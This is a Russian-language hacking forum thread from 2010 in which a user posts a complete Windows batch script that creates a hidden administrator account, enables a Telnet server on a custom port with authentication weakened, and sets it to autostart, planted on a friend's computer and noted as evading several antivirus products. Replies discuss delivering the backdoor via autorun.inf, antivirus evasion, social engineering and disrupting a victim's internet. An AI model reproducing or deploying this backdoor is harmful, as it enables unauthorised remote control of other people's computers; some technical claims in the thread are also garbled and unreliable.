Взлом через telnet
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Взлом через telnet - 2010-03-21 12:20:08.590000
|
|
|
Yurchik26
Сообщений: 6
Оценки: 0
Присоединился: 2010-03-21 11:54:17.970000
|
Привет. У меня есть bat файл, практически сделанный мной. Когда я закинул его на компьютер друга, открылся порт который я указал, и при проверке сетевым сканером всё работало. При попытке подключения, его компьютер разрывал соединение. Пожалуйста обьясните если я сделал что-то не так. Вот исходник bat файла. Звёздочки это пароль.
@echo off
chcp 1251
net user SUPPORT_388945a0 /delete
net user Netscan ****** /add
net localgroup Администраторы Netscan /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v Netscan /t REG_DWORD /d 00000000 /f
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
start C:\windows\system32\tlntsvr.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Netscan /t REG_SZ /d C:\windows\system32\tlntsvr.exe /f
Этот файл был проверен на 4 антивирусах. Kaspersky, NOD32, DrWeb -его не увидели, а Avast бесплатного распространения его запалил. Но у друга не Avast.
|
|
|
|
|
RE: Взлом через telnet - 2010-03-21 12:23:18.436666
|
|
|
DimonHaker
Сообщений: 444
Оценки: 0
Присоединился: 2009-11-20 17:42:29.216666
|
у него инет плохой
|
|
|
|
|
RE: Взлом через telnet - 2010-03-21 12:23:47.570000
|
|
|
Yurchik26
Сообщений: 6
Оценки: 0
Присоединился: 2010-03-21 11:54:17.970000
|
У него 1 MB
|
|
|
|
|
RE: Взлом через telnet - 2010-03-21 12:29:04.040000
|
|
|
Konkret
Сообщений: 50
Оценки: 0
Присоединился: 2010-01-05 15:07:19.663333
|
наверно твой друг сидит за NAT-ом
|
|
|
|
|
RE: Взлом через telnet - 2010-03-21 12:36:16.510000
|
|
|
Yurchik26
Сообщений: 6
Оценки: 0
Присоединился: 2010-03-21 11:54:17.970000
|
Менять эту строчку tlntadmn config port=972 sec=-NTLM
|
|
|
|
|
RE: Взлом через telnet - 2010-03-21 16:30:32.653333
|
|
|
Yurchik26
Сообщений: 6
Оценки: 0
Присоединился: 2010-03-21 11:54:17.970000
|
Спасибо. Он действительно сидел за NAT портом))))) Большое спасибо.
|
|
|
|
|
RE: Взлом через telnet - 2010-03-22 12:27:09.306666
|
|
|
Konkret
Сообщений: 50
Оценки: 0
Присоединился: 2010-01-05 15:07:19.663333
|
и у меня похожая проблемка,как будем NAT обходить?
|
|
|
|
|
RE: Взлом через telnet - 2010-03-22 12:31:14.350000
|
|
|
nik542
Сообщений: 30
Оценки: 0
Присоединился: 2010-03-04 11:49:54.873333
|
Растолкуйте мне.
В виндовозных папках есть фаил десктоп ини. который обрабатывается при открытии папки.
Можно ли в этот фаил вставить запуск бат файла?
|
|
|
|
|
RE: Взлом через telnet - 2010-03-25 10:03:46.783333
|
|
|
Yurchik26
Сообщений: 6
Оценки: 0
Присоединился: 2010-03-21 11:54:17.970000
|
А я NAT порт и не обходил, я просто заменил эту строчку
tlntadmn config port=972 sec=-NTLM
Следующей
tlntadmn config port=972 sec=-NAT
И о боже! Всё заработало.)))))
|
|
|
|
|
RE: Взлом через telnet - 2010-03-25 10:06:54.560000
|
|
|
Yurchik26
Сообщений: 6
Оценки: 0
Присоединился: 2010-03-21 11:54:17.970000
|
Навряд ли в desktop.ini можно что нибудь вставить. А тебе зачем если не секрет?
|
|
|
|
|
RE: Взлом через telnet - 2010-03-25 10:43:40.796666
|
|
|
immortal555
Сообщений: 141
Оценки: 0
Присоединился: 2009-07-29 09:18:47.653333
|
Не буду говорить наверняка, но по-моему INI файлы не могут запускать что-то, они лишь содержат сведения о определенной конфигурации
|
|
|
|
|
RE: Взлом через telnet - 2010-03-29 13:31:34.216666
|
|
|
nik542
Сообщений: 30
Оценки: 0
Присоединился: 2010-03-04 11:49:54.873333
|
quote:
ORIGINAL: Yurchik26
Навряд ли в desktop.ini можно что нибудь вставить. А тебе зачем если не секрет?
Чтобы батник с телнет бэкдор`ом запустился. на удалённом компе.
Либо есть другой способ кроме СИ
|
|
|
|
|
RE: Взлом через telnet - 2010-03-29 21:27:40.203333
|
|
|
qTigerqaz
Сообщений: 38
Оценки: 0
Присоединился: 2008-01-28 19:45:37.980000
|
а как батник закинуть на комп зная только Айпи
|
|
|
|
|
RE: Взлом через telnet - 2010-03-30 07:55:29.370000
|
|
|
Barkass$
Сообщений: 1854
Оценки: 40
Присоединился: 2008-11-11 12:19:45.216666
|
quote:
а как батник закинуть на комп зная только Айпи
Просканировать машину. Воспользоваться СИ. Вообще методов многа, для тебя пока этих 2-х ватит X)
|
|
|
|
|
RE: Взлом через telnet - 2010-03-30 09:00:23.063333
|
|
|
TipTop1000
Сообщений: 422
Оценки: 0
Присоединился: 2009-10-30 19:09:21.850000
|
вот тут почитай http://www.hackzona.ru/hz.php?name=News&file=article&sid=8820
|
|
|
|
|
RE: Взлом через telnet - 2010-03-30 11:10:46.560000
|
|
|
nik542
Сообщений: 30
Оценки: 0
Присоединился: 2010-03-04 11:49:54.873333
|
помогите не могу найти как запускается bat из autorun.inf.
конвертнул бат в ехе кинул на флэшку а каспер? кричит "попытка скрытой установки" при этом 9ый каспер молча хавает.
может если запускать как бат фаил авир не восстанет.
ЗЫ.
в бате код под телнет
|
|
|
|
|
RE: Взлом через telnet - 2010-04-15 20:07:32.530000
|
|
|
S0yer
Сообщений: 2
Оценки: 0
Присоединился: 2010-04-06 21:52:18.666666
|
Подскажите как можно отключить подключение к инету у жертвы имея доступ через телнет, при этом желательно чтобы сетка осталась работать :)
Может быть можно службу какую-то отключить, или порты заблокировать, или еще чего?
Или направьте где можно вычитать об этом, а то у меня не получается найти инфу.
Доступ к инету организован через свитч-модем напрямую, так что прикол с фаерволом не прокатит :(
Доступ к модему (Calisto 821+) тоже имеется, но не очень хочется там лазить, ибо спалить легко могут.
|
|
|
|
|
RE: Взлом через telnet - 2010-04-15 20:12:00.480000
|
|
|
DeepBlue7.
Сообщений: 186
Оценки: 0
Присоединился: 2010-04-14 21:59:42.853333
|
А зачем как ты говоришь "бэкдорить" ?
sc config tlntsvr start= auto
подразумевает автозапуск телнета при загрузке системы
|
|
|
|
|
|
